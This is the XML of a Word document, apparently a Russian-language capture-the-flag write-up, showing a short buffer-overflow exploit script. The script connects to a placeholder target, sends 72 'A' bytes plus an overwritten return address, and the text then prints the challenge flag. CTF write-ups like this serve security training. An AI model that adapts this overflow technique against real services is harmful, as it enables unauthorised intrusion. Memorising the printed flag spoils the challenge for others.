              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="009A0DB2">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009A0DB2">
              <w:rPr>
                <w:rStyle w:val="pl-en"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>remote</w:t>
            </w:r>
            <w:r w:rsidRPr="009A0DB2">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009A0DB2">
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>'TARGET_IP'</w:t>
            </w:r>
            <w:r w:rsidRPr="009A0DB2">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="009A0DB2">
              <w:rPr>
                <w:rStyle w:val="pl-v"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TARGET_PORT</w:t>
            </w:r>
            <w:r w:rsidRPr="009A0DB2">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009A0DB2" w:rsidRPr="009A0DB2" w:rsidRDefault="009A0DB2" w:rsidP="009A0DB2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9A0DB2" w:rsidRPr="009A0DB2" w:rsidRDefault="009A0DB2" w:rsidP="009A0DB2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9A0DB2">
              <w:rPr>
                <w:rStyle w:val="pl-v"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>OFFSET</w:t>
            </w:r>
            <w:r w:rsidRPr="009A0DB2">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="009A0DB2">
              <w:rPr>
                <w:rStyle w:val="pl-c1"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="009A0DB2">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="009A0DB2">
              <w:rPr>
                <w:rStyle w:val="pl-c1"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>72</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009A0DB2" w:rsidRPr="009A0DB2" w:rsidRDefault="009A0DB2" w:rsidP="009A0DB2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9A0DB2">
              <w:rPr>
                <w:rStyle w:val="pl-s1"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>payload</w:t>
            </w:r>
            <w:r w:rsidRPr="009A0DB2">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="009A0DB2">
              <w:rPr>
                <w:rStyle w:val="pl-c1"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="009A0DB2">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="009A0DB2">
              <w:rPr>
                <w:rStyle w:val="pl-v"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>OFFSET</w:t>
            </w:r>
            <w:r w:rsidRPr="009A0DB2">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="009A0DB2">
              <w:rPr>
                <w:rStyle w:val="pl-c1"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
            <w:r w:rsidRPr="009A0DB2">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="009A0DB2">
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>'A'</w:t>
            </w:r>
            <w:r w:rsidRPr="009A0DB2">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="009A0DB2">
              <w:rPr>
                <w:rStyle w:val="pl-c1"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidRPr="009A0DB2">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="009A0DB2">
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>'</w:t>
            </w:r>
            <w:r w:rsidRPr="009A0DB2">
              <w:rPr>
                <w:rStyle w:val="pl-cce"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>\x00\x00\x00\x00\x00\x40\x06\x07</w:t>
            </w:r>
            <w:r w:rsidRPr="009A0DB2">
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>'</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009A0DB2">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[::</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009A0DB2">
              <w:rPr>
                <w:rStyle w:val="pl-c1"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>-1</w:t>
            </w:r>
            <w:r w:rsidRPr="009A0DB2">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">] </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009A0DB2" w:rsidRPr="009A0DB2" w:rsidRDefault="009A0DB2" w:rsidP="009A0DB2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proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009A0DB2">
              <w:rPr>
                <w:rStyle w:val="pl-s1"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>conn</w:t>
            </w:r>
            <w:r w:rsidRPr="009A0DB2">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="009A0DB2">
              <w:rPr>
                <w:rStyle w:val="pl-en"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>sendline</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009A0DB2">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="009A0DB2">
              <w:rPr>
                <w:rStyle w:val="pl-s1"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>payload</w:t>
            </w:r>
            <w:r w:rsidRPr="009A0DB2">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009A0DB2" w:rsidRPr="009A0DB2" w:rsidRDefault="009A0DB2" w:rsidP="009A0DB2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9A0DB2">
              <w:rPr>
                <w:rStyle w:val="pl-en"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>print</w:t>
            </w:r>
            <w:r w:rsidRPr="009A0DB2">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009A0DB2">
              <w:rPr>
                <w:rStyle w:val="pl-s1"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>conn</w:t>
            </w:r>
            <w:r w:rsidRPr="009A0DB2">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="009A0DB2">
              <w:rPr>
                <w:rStyle w:val="pl-en"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>recv</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009A0DB2">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>())</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009A0DB2" w:rsidRPr="009A0DB2" w:rsidRDefault="009A0DB2">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="161B22"/>
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="E6EDF3"/>
                <w:shd w:val="clear" w:color="auto" w:fill="0D1117"/>
              </w:rPr>
              <w:t>Отправляем нашу полезную нагрузку и получаем флаг: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="a6"/>
                <w:rFonts w:ascii="Segoe UI" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="E6EDF3"/>
                <w:shd w:val="clear" w:color="auto" w:fill="0D1117"/>
              </w:rPr>
              <w:t>kxctf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="a6"/>
                <w:rFonts w:ascii="Segoe UI" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="E6EDF3"/>
                <w:shd w:val="clear" w:color="auto" w:fill="0D1117"/>
              </w:rPr>
              <w:t>{u_@r3_str0ng_0n3_but_th4ts_n0t_4ll_tg_OxSBI}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009A0DB2" w:rsidRPr="009A0DB2" w:rsidRDefault="009A0DB2" w:rsidP="009A0DB2">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009A0DB2" w:rsidRPr="009A0DB2" w:rsidRDefault="009A0DB2" w:rsidP="009A0DB2">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009A0DB2" w:rsidRPr="009A0DB2" w:rsidRDefault="009A0DB2" w:rsidP="009A0DB2">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009A0DB2" w:rsidRPr="009A0DB2" w:rsidRDefault="009A0DB2" w:rsidP="009A0DB2">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009A0DB2" w:rsidRPr="009A0DB2" w:rsidRDefault="009A0DB2" w:rsidP="009A0DB2">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009A0DB2" w:rsidRPr="009A0DB2" w:rsidRDefault="009A0DB2" w:rsidP="009A0DB2">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009A0DB2" w:rsidRPr="009A0DB2" w:rsidRDefault="009A0DB2" w:rsidP="009A0DB2">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009A0DB2" w:rsidRPr="009A0DB2" w:rsidRDefault="009A0DB2" w:rsidP="009A0DB2">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009A0DB2" w:rsidRPr="009A0DB2" w:rsidRDefault="009A0DB2" w:rsidP="009A0DB2">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009A0DB2" w:rsidRPr="009A0DB2" w:rsidRDefault="009A0DB2" w:rsidP="009A0DB2">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009A0DB2" w:rsidRPr="009A0DB2" w:rsidRDefault="009A0DB2" w:rsidP="009A0DB2">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009A0DB2" w:rsidRPr="009A0DB2" w:rsidRDefault="009A0DB2" w:rsidP="009A0DB2">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009A0DB2" w:rsidRPr="009A0DB2" w:rsidRDefault="009A0DB2" w:rsidP="009A0DB2">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009A0DB2" w:rsidRPr="009A0DB2" w:rsidRDefault="009A0DB2" w:rsidP="009A0DB2">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009A0DB2" w:rsidRPr="009A0DB2" w:rsidRDefault="009A0DB2" w:rsidP="009A0DB2">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009A0DB2" w:rsidRPr="009A0DB2" w:rsidRDefault="009A0DB2" w:rsidP="009A0DB2">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009A0DB2" w:rsidRPr="009A0DB2" w:rsidRDefault="009A0DB2" w:rsidP="009A0DB2">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009A0DB2" w:rsidRPr="009A0DB2" w:rsidRDefault="009A0DB2" w:rsidP="009A0DB2">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009A0DB2" w:rsidRPr="009A0DB2" w:rsidRDefault="009A0DB2" w:rsidP="009A0DB2">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009A0DB2" w:rsidRPr="009A0DB2" w:rsidRDefault="009A0DB2" w:rsidP="009A0DB2">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009A0DB2" w:rsidRPr="009A0DB2" w:rsidRDefault="009A0DB2" w:rsidP="009A0DB2">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009A0DB2" w:rsidRPr="009A0DB2" w:rsidRDefault="009A0DB2" w:rsidP="009A0DB2">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009A0DB2" w:rsidRPr="009A0DB2" w:rsidRDefault="009A0DB2" w:rsidP="009A0DB2">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009A0DB2" w:rsidRPr="009A0DB2" w:rsidRDefault="009A0DB2" w:rsidP="009A0DB2">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009A0DB2" w:rsidRPr="009A0DB2" w:rsidRDefault="009A0DB2" w:rsidP="009A0DB2">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009A0DB2" w:rsidRPr="009A0DB2" w:rsidRDefault="009A0DB2" w:rsidP="009A0DB2">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009A0DB2" w:rsidRPr="009A0DB2" w:rsidRDefault="009A0DB2" w:rsidP="009A0DB2">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F12C76" w:rsidRPr="009A0DB2" w:rsidRDefault="00F12C76" w:rsidP="006C0B77">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00F12C76" w:rsidRPr="009A0DB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6624D1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="37B23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DB2"/>
    <w:rsid w:val="006C0B77"/>
    <w:rsid w:val="008242FF"/>
    <w:rsid w:val="00870751"/>
    <w:rsid w:val="00922C48"/>
    <w:rsid w:val="009A0DB2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FC51E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{BE6B979D-2307-4192-8473-C0F02D8E9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9A0DB2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9A0DB2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0D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0DB2"/>
    <w:rPr>
      <w:rFonts w:ascii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9A0DB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9A0DB2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9A0DB2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A0D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A0DB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9A0DB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pl-c">
    <w:name w:val="pl-c"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="009A0DB2"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-k">
    <w:name w:val="pl-k"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="009A0DB2"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-s">
    <w:name w:val="pl-s"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="009A0DB2"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-pds">
    <w:name w:val="pl-pds"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="009A0DB2"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-c1">
    <w:name w:val="pl-c1"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="009A0DB2"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-smi">
    <w:name w:val="pl-smi"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="009A0DB2"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-s1">
    <w:name w:val="pl-s1"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="009A0DB2"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-en">
    <w:name w:val="pl-en"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="009A0DB2"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-v">
    <w:name w:val="pl-v"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="009A0DB2"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-cce">
    <w:name w:val="pl-cce"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="009A0DB2"/>
  </w:style>
  <w:style w:type="table" w:styleId="a5">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="009A0DB2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9A0D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25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9E%D1%88%D0%B8%D0%B1%D0%BA%D0%B0_%D1%81%D0%B5%D0%B3%D0%BC%D0%B5%D0%BD%D1%82%D0%B0%D1%86%D0%B8%D0%B8" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ctftime.org/event/2344/task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410</Words>
  <Characters>2343</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>19</Lines>
  <Paragraphs>5</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>SPecialiST RePack</Company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2024-06-29T17:18:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-29T17:20:00Z</dcterms:modified>
</cp:coreProperties>
</file>